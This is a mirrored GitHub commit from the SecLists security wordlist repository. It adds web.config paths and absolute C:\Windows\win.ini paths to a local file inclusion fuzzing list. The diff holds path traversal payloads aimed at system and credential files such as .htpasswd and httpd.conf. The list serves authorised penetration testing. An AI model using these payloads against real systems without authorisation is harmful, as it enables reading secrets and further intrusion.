mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-31 21:24:07 +01:00
Merge pull request #1029 from exploide/LFI-Jhaddix-additions
LFI: added absolute C:\Windows\win.ini paths and web.config
This commit is contained in:
commit
fc8f848a51
1 changed files with 7 additions and 0 deletions
|
|
@ -83,6 +83,11 @@ C:\boot.ini
|
|||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
c:\inetpub\wwwroot\index.asp
|
||||
web.config
|
||||
/web.config
|
||||
\web.config
|
||||
../web.config
|
||||
..\web.config
|
||||
/config.asp
|
||||
../config.asp
|
||||
config.asp
|
||||
|
|
@ -781,6 +786,8 @@ users/.htpasswd
|
|||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/web/conf/php.ini
|
||||
/WINDOWS\php.ini
|
||||
C:\Windows\win.ini
|
||||
C:/Windows/win.ini
|
||||
../../windows/win.ini
|
||||
../../../../../../../../windows/win.ini
|
||||
..\..\..\..\..\..\..\..\windows\win.ini
|
||||
|
|
|
|||
Loading…
Reference in a new issue